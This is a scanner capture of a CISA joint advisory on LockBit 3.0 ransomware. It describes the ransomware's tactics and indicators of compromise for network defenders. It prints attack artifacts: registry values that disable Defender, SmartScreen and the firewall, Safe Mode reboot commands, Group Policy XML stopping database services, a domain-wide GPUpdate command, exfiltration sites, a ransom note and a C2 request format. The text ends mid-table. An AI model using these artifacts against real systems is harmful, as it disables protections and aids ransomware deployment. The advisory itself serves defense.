www.cisa.gov
Open in
urlscan Pro
2600:1408:ec00:284::447a
Public Scan
URL:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Submission: On December 03 via api from IN — Scanned from US
Submission: On December 03 via api from IN — Scanned from US
Form analysis 2 forms found in the DOM
<form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id1">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id50" class="gstl_50 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti50" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id1" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st50" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb50" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form><form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id2">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id51" class="gstl_51 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti51" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id2" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st51" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb51" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form>Text Content
Skip to main content
An official website of the United States government
Here’s how you know
Here’s how you know
Official websites use .gov
A .gov website belongs to an official government organization in the United
States.
Secure .gov websites use HTTPS
A lock (LockA locked padlock) or https:// means you’ve safely connected to the
.gov website. Share sensitive information only on official, secure websites.
Free Cyber ServicesElection Threat Updates#protect2024Secure Our WorldShields
UpReport A Cyber Issue
Search
×
search
Menu
Close
×
search
* Topics
Topics
Cybersecurity Best Practices
Cyber Threats and Advisories
Critical Infrastructure Security and Resilience
Election Security
Emergency Communications
Industrial Control Systems
Information and Communications Technology Supply Chain Security
Partnerships and Collaboration
Physical Security
Risk Management
How can we help?
GovernmentEducational InstitutionsIndustryState, Local, Tribal, and
TerritorialIndividuals and FamiliesSmall and Medium BusinessesFind Help
LocallyFaith-Based CommunityExecutivesHigh-Risk Communities
* Spotlight
* Resources & Tools
Resources & Tools
All Resources & Tools
Services
Programs
Resources
Training
Groups
* News & Events
News & Events
News
Events
Cybersecurity Alerts & Advisories
Directives
Request a CISA Speaker
Congressional Testimony
CISA Conferences
CISA Live!
* Careers
Careers
Benefits & Perks
HireVue Applicant Reasonable Accommodations Process
Hiring
Resume & Application Tips
Students & Recent Graduates
Veteran and Military Spouses
Work @ CISA
* About
About
Culture
Divisions & Offices
Regions
Leadership
Doing Business with CISA
Site Links
Reporting Employee and Contractor Misconduct
CISA GitHub
CISA Central
2023 Year In Review
Contact Us
Subscribe
Free Cyber ServicesElection Threat Updates#protect2024Secure Our WorldShields
UpReport A Cyber Issue
Breadcrumb
1. Home
2. News & Events
3. Cybersecurity Advisories
4. Cybersecurity Advisory
Share:
Cybersecurity Advisory
#STOPRANSOMWARE: LOCKBIT 3.0
Release Date
March 16, 2023
Alert Code
AA23-075A
Related topics:
Malware, Phishing, and Ransomware, Cyber Threats and Advisories
ACTIONS TO TAKE TODAY TO MITIGATE CYBER THREATS FROM RANSOMWARE:
1. Prioritize remediating known exploited vulnerabilities.
2. Train users to recognize and report phishing attempts.
3. Enable and enforce phishing-resistant multifactor authentication.
SUMMARY
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing
#StopRansomware effort to publish advisories for network defenders that detail
ransomware variants and ransomware threat actors. These #StopRansomware
advisories include recently and historically observed tactics, techniques, and
procedures (TTPs) and indicators of compromise (IOCs) to help organizations
protect against ransomware. Visit stopransomware.gov to see all #StopRansomware
advisories and to learn more about other ransomware threats and no-cost
resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure
Security Agency (CISA), and the Multi-State Information Sharing & Analysis
Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0
ransomware IOCs and TTPs identified through FBI investigations as recently as
March 2023.
The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service
(RaaS) model and is a continuation of previous versions of the ransomware,
LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an
affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use
many varying TTPs and attack a wide range of businesses and critical
infrastructure organizations, which can make effective computer network defense
and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the
recommendations in the mitigations section of this CSA to reduce the likelihood
and impact of ransomware incidents.
Download the PDF version of this report:
#StopRansomware: Lockbit 3.0 (PDF, 688.70 KB )
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12.
See the MITRE ATT&CK Tactics and Techniques section for a table of the threat
actors’ activity mapped to MITRE ATT&CK for Enterprise(link is external).
CAPABILITIES
LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its
previous versions and shares similarities with Blackmatter and Blackcat
ransomware.
LockBit 3.0 is configured upon compilation with many different options that
determine the behavior of the ransomware. Upon the actual execution of the
ransomware within a victim environment, various arguments can be supplied to
further modify the behavior of the ransomware. For example, LockBit 3.0 accepts
additional arguments for specific operations in lateral movement and rebooting
into Safe Mode (see LockBit Command Line parameters under Indicators of
Compromise). If a LockBit affiliate does not have access to passwordless LockBit
3.0 ransomware, then a password argument is mandatory during the execution of
the ransomware. LockBit 3.0 affiliates failing to enter the correct password
will be unable to execute the ransomware [T1480.001(link is external)]. The
password is a cryptographic key which decodes the LockBit 3.0 executable. By
protecting the code in such a manner, LockBit 3.0 hinders malware detection and
analysis with the code being unexecutable and unreadable in its encrypted form.
Signature-based detections may fail to detect the LockBit 3.0 executable as the
executable’s encrypted potion will vary based on the cryptographic key used for
encryption while also generating a unique hash. When provided the correct
password, LockBit 3.0 will decrypt the main component, continue to decrypt or
decompress its code, and execute the ransomware.
LockBit 3.0 will only infect machines that do not have language settings
matching a defined exclusion list. However, whether a system language is checked
at runtime is determined by a configuration flag originally set at compilation
time. Languages on the exclusion list include, but are not limited to, Romanian
(Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion
list is detected [T1614.001(link is external)], LockBit 3.0 will stop execution
without infecting the system.
INITIAL ACCESS
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim
networks via remote desktop protocol (RDP) exploitation [T1133(link is
external)], drive-by compromise [T1189(link is external)], phishing campaigns
[T1566(link is external)], abuse of valid accounts [T1078(link is external)],
and exploitation of public-facing applications [T1190(link is external)].
EXECUTION AND INFECTION PROCESS
During the malware routine, if privileges are not sufficient, LockBit 3.0
attempts to escalate to the required privileges [TA0004(link is external)].
LockBit 3.0 performs functions such as:
* Enumerating system information such as hostname, host configuration, domain
information, local drive configuration, remote shares, and mounted external
storage devices [T1082(link is external)]
* Terminating processes and services [T1489(link is external)]
* Launching commands [TA0002(link is external)]
* Enabling automatic logon for persistence and privilege escalation [T1547(link
is external)]
* Deleting log files, files in the recycle bin folder, and shadow copies
residing on disk [T1485(link is external)], [T1490(link is external)]
LockBit 3.0 attempts to spread across a victim network by using a preconfigured
list of credentials hardcoded at compilation time or a compromised local account
with elevated privileges [T1078(link is external)]. When compiled, LockBit 3.0
may also enable options for spreading via Group Policy Objects and PsExec using
the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt
[T1486(link is external)] data saved to any local or remote device, but skips
files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename
<Ransomware ID>.README.txt and changes the host’s wallpaper and icons to LockBit
3.0 branding [T1491.001(link is external)]. If needed, LockBit 3.0 will send
encrypted host and bot information to a command and control (C2) server
[T1027(link is external)].
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004(link is
external)] as well as any Group Policy updates that were made, depending on
which options were set at compilation time.
EXFILTRATION
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously
with LockBit 2.0 [TA0010(link is external)]; rclone, an open-source command line
cloud storage manager [T1567.002(link is external)]; and publicly available file
sharing services, such as MEGA [T1567.002(link is external)], to exfiltrate
sensitive company data files prior to encryption. While rclone and many publicly
available file sharing services are primarily used for legitimate purposes, they
can also be used by threat actors to aid in system compromise, network
exploration, or data exfiltration. LockBit 3.0 affiliates often use other
publicly available file sharing services to exfiltrate data as well [T1567(link
is external)] (see Table 1).
Table 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System
Encryption File Sharing Site File Sharing Site https://www.premiumize[.]com File
Sharing Site https://anonfiles[.]com File Sharing Site
https://www.sendspace[.]com File Sharing Site https://fex[.]net File Sharing
Site https://transfer[.]sh File Sharing Site https://send.exploit[.]in
LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS
LockBit affiliates have been observed using various freeware and open-source
tools during their intrusions. These tools are used for a range of activities
such as network reconnaissance, remote access and tunneling, credential dumping,
and file exfiltration. Use of PowerShell and Batch scripts are observed across
most intrusions, which focus on system discovery, reconnaissance,
password/credential hunting, and privilege escalation. Artifacts of professional
penetration-testing tools such as Metasploit and Cobalt Strike have also been
observed. See Table 2 for a list of legitimate freeware and open-source tools
LockBit affiliates have repurposed for ransomware operations:
Table 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates Tool
Description MITRE ATT&CK ID Tool Chocolatey Description Command-line package
manager for Windows. MITRE ATT&CK ID T1072(link is external) Tool FileZilla
Description Cross-platform File Transfer Protocol (FTP) application. MITRE
ATT&CK ID T1071.002(link is external) Tool Impacket Description Collection of
Python classes for working with network protocols. MITRE ATT&CK ID S0357(link is
external) Tool MEGA Ltd MegaSync Description Cloud-based synchronization tool.
MITRE ATT&CK ID T1567.002(link is external) Tool Microsoft Sysinternals ProcDump
Description Generates crash dumps. Commonly used to dump the contents of Local
Security Authority Subsystem Service, LSASS.exe. MITRE ATT&CK ID T1003.001(link
is external) Tool Microsoft Sysinternals PsExec Description Execute a
command-line process on a remote machine. MITRE ATT&CK ID S0029(link is
external) Tool Mimikatz Description Extracts credentials from system. MITRE
ATT&CK ID S0002(link is external) Tool Ngrok Description Legitimate
remote-access tool abused to bypass victim network protections. MITRE ATT&CK ID
S0508(link is external) Tool PuTTY Link (Plink) Description Can be used to
automate Secure Shell (SSH) actions on Windows. MITRE ATT&CK ID T1572(link is
external) Tool Rclone Description Command-line program to manage cloud storage
files MITRE ATT&CK ID S1040(link is external) Tool SoftPerfect Network Scanner
Description Performs network scans. MITRE ATT&CK ID T1046(link is external) Tool
Splashtop Description Remote-desktop software. MITRE ATT&CK ID T1021.001(link is
external) Tool WinSCP Description SSH File Transfer Protocol client for Windows.
MITRE ATT&CK ID T1048(link is external)
INDICATORS OF COMPROMISE (IOCS)
The IOCs and malware characteristics outlined below were derived from field
analysis. The following samples are current as of March 2023.
LOCKBIT 3.0 BLACK ICON
LOCKBIT 3.0 WALLPAPER
LOCKBIT COMMAND LINE PARAMETERS
LockBit Parameters Description LockBit Parameters -del Description Self-delete.
LockBit Parameters -gdel Description Remove LockBit 3.0 group policy changes.
LockBit Parameters -gspd Description Spread laterally via group policy. LockBit
Parameters -pass (32 character value) Description (Required) Password used to
launch LockBit 3.0. LockBit Parameters -path (File or path) Description Only
encrypts provided file or folder. LockBit Parameters -psex Description Spread
laterally via admin shares. LockBit Parameters -safe Description Reboot host
into Safe Mode. LockBit Parameters -wall Description Sets LockBit 3.0 Wallpaper
and prints out LockBit 3.0 ransom note.
MUTUAL EXCLUSION OBJECT (MUTEX) CREATED
When executed, LockBit 3.0 will create the mutex, Global\<MD4 hash of machine
GUID>,
and check to see if this mutex has already been created to avoid running more
than one instance of the ransomware.
UAC BYPASS VIA ELEVATED COM INTERFACE
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code
with elevated privileges via elevated Component Object Model (COM) Interface.
C:\Windows\System32\dllhost.exe is spawned with high integrity with the command
line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC.
For example, %SYSTEM32%\dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063-
A120244FBEC7}.
VOLUME SHADOW COPY DELETION
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete
Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query
for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow
copy, and DeleteInstance to delete any shadow copies.
REGISTRY ARTIFACTS
LockBit 3.0 Icon Registry Key Value Data Registry Key HKCR\. <Malware Extension>
Value (Default) Data <Malware Extension> Registry Key HKCR\<Malware
Extension>\DefaultIcon Value (Default) Data C:\ProgramData\<Mal ware
Extension>.ico
LockBit 3.0 Wallpaper Registry Key Value Data Registry Key HKCU\Control
Panel\Desktop\WallPaper Value (Default) Data C:\ProgramData\<Mal ware
Extension>.bmp
Disable Privacy Settings Experience Registry Key Value Data Registry Key
SOFTWARE\Policies\Microsoft\Win dows\OOBE Value DisablePrivacyE xperience Data 0
Enable Automatic Logon Registry Key Value Data Registry Key
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Value AutoAdminLogon Data
1 Registry Key Value DefaultUserName Data <username> Registry Key Value
DefaultDomainNa me Data <domain name> Registry Key Value DefaultPassword Data
<password>
Disable and Clear Windows Event Logs Registry Key Value Data Registry Key
HKLM\SOFTWARE\Microsoft\Windows \CurrentVersion\WINEVT\Channels \* Value Enabled
Data 0 Registry Key HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\WINEVT\Channels \* \ChannelAccess Value ChannelAccess Data
AO:BAG:SYD:(A;;0x1;; ;SY)(A;;0x5;;;BA)(A; ;0x1;;;LA)
Ransom Locations LockBit 3.0 File Path Locations LockBit 3.0 File Path Locations
ADMIN$\Temp\<LockBit3.0 Filename>.exe LockBit 3.0 File Path Locations
%SystemRoot%\Temp\<LockBit3.0 Filename>.exe LockBit 3.0 File Path Locations
\<Domain Name>\sysvol\<Domain Name>\scripts\<Lockbit 3.0 Filename>.exe (Domain
Controller)
SAFE MODE LAUNCH COMMANDS
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and
detection. Depending upon the host operating system, the following command is
launched to reboot the system to Safe Mode with Networking:
Operating System Safe Mode with Networking command Operating System Vista and
newer Safe Mode with Networking command bcdedit /set {current} safeboot network
Operating System Pre-Vista Safe Mode with Networking command bootcfg /raw /a
/safeboot:network /id 1
Operating System Disable Safe mode reboot Operating System Vista and newer
Disable Safe mode reboot bcdedit /deletevalue {current} safeboot Operating
System Pre-Vista Disable Safe mode reboot bootcfg /raw /fastdetect /id 1
GROUP POLICY ARTIFACTS
The following are Group Policy Extensible Markup Language (XML) files identified
after a LockBit 3.0 infection:
NetworkShares.xml NetworkShares.xml <?xml version="1.0" encoding="utf-8"?>
<NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}">
<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}"
image="2" name="%%ComputerName%%_D" changed="%s" uid="%s">
<Properties action="U" name="%%ComputerName%%_D" path="D:" comment=""
allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE"
abe="NO_CHANGE"/>
Services.xml stops and disables services on the Active Directory (AD) hosts.
Services.xml Services.xml <?xml version="1.0" encoding="utf-8"?>
<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP"
timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLPBENGINE"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0"
removePolicy="0" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLFDLauncher"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLSERVERAGENT"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSASTELEMETRY"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP"
timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s"
disabled="0">
<Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay
Client" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s"
disabled="0">
<Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay
Controller" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MsDtsServer150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISTELEMETRY150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLLaunchpad"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP"
timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLTELEMETRY"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLSERVER"
serviceAction="STOP" timeout="60"/>
</NTService>
</NTServices>
REGISTRY.POL
The following registry configuration changes values for the Group Policy refresh
time, disable SmartScreen, and disable Windows Defender.
Registry Key Registry Value Value type Data Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s\System Registry Value
GroupPolicyRefresh TimeDC Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s\System Registry Value
GroupPolicyRefresh TimeOffsetDC Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s\System Registry Value
GroupPolicyRefresh Time Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s\System Registry Value
GroupPolicyRefresh TimeOffset Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s\System Registry Value
EnableSmartScreen Value type REG_D WORD Data 0 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s\System Registry Value
**del.ShellSmartSc reenLevel Value type REG_S Z Data Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender Registry Value
DisableAntiSpyware Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender Registry Value
DisableRoutinelyTa kingAction Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Real-Time Protection Registry
Value DisableRealtimeMon itoring Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Real-Time Protection Registry
Value DisableBehaviorMon itoring Value type REG_D WORD Data 1 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Spynet Registry Value
SubmitSamplesConse nt Value type REG_D WORD Data 2 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Spynet Registry Value
SpynetReporting Value type REG_D WORD Data 0 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window sFirewall\DomainProfile Registry Value
EnableFirewall Value type REG_D WORD Data 0 Registry Key
HKLM\SOFTWARE\Policies\Microsoft\Window sFirewall\StandardProfile Registry Value
EnableFirewall Value type REG_D WORD Data 0
FORCE GPUPDATE
Once new group policies are added, a PowerShell command using Group Policy
update (GPUpdate) applies the new group policy changes to all computers on the
AD domain.
Force GPUpdate Powershell Command Force GPUpdate Powershell Command powershell
Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke- GPUpdate
-computer $_.name -force -RandomDelayInMinutes 0}
SERVICES KILLED
vss sql svc$ memtas mepocs msexchange sophos veeam backup GxVss GxBlr GxFWD
GxCVD GxCIMgr
PROCESSES KILLED
sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice
ocautoupds encsvc firefox tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice
excel infopath msaccess mspu onenote outlook powerpnt steam thebat thunderbird
visio winword wordpad notepad
LOCKBIT 3.0 RANSOM NOTE
~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet
sites. Keep in mind that once your data appears on our leak site, it could be
bought by your competitors at any second, so don't hesitate for a long time. The
sooner you pay the ransom, the sooner your company will be safe.
NETWORK CONNECTIONS
If configured, Lockbit 3.0 will send two HTTP POST requests to one of the
C2servers. Information about the victim host and bot are encrypted with an
Advanced Encryption Standard (AES) key and encoded in Base64.
Example of HTTP POST request
POST <Lockbit
C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8
HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit
ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI&
6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted
data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR&
m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{
"bot_version":"X",
"bot_id":"X",
"bot_company":"X", "host_hostname":"X", "host_user":"X",
"host_os":"X",
"host_domain":"X",
"host_arch":"X",
"host_lang":"X", "disks_info":[
{
"disk_name":"X",
"disk_size":"XXXX", "free_size":"XXXXX"
}
USER AGENT STRINGS
Mozilla/5.0 (Windows NT
6.1) AppleWebKit/587.38
(KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edge/91.0.864.37
Firefox/89.0 Gecko/20100101
MITRE ATT&CK TECHNIQUES
See Table 3 for all referenced threat actor tactics and techniques in this
advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s
Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Initial Access
Technique Title
ID
Use
Initial Access
Valid Accounts
Initial Access
T1078(link is external)
Initial Access
LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means
of gaining initial access.
Initial Access
Exploit External Remote Services
Initial Access
T1133(link is external)
Initial Access
LockBit 3.0 actors exploit RDP to gain access to victim networks.
Initial Access
Drive-by Compromise
Initial Access
T1189(link is external)
Initial Access
LockBit 3.0 actors gain access to a system through a user visiting a website
over the normal course of browsing.
Initial Access
Exploit Public-Facing Application
Initial Access
T1190(link is external)
Initial Access
LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain
access to victims’ systems.
Initial Access
Phishing
Initial Access
T1566(link is external)
Initial Access
LockBit 3.0 actors use phishing and spearphishing to gain access to victims'
networks.
Execution
Technique Title
ID
Use
Execution
Execution
Execution
TA0002(link is external)
Execution
LockBit 3.0 launches commands during its execution.
Execution
Software Deployment Tools
Execution
T1072(link is external)
Execution
LockBit 3.0 uses Chocolatey, a command- line package manager for Windows.
Persistence
Technique Title
ID
Use
Persistence
Valid Accounts
Persistence
T1078(link is external)
Persistence
LockBit 3.0 uses a compromised user account to maintain persistence on the
target network.
Persistence
Boot or Logo Autostart Execution
Persistence
T1547(link is external)
Persistence
LockBit 3.0 enables automatic logon for persistence.
Privilege Escalation
Technique Title
ID
Use
Privilege Escalation
Privilege Escalation
Privilege Escalation
TA0004(link is external)
Privilege Escalation
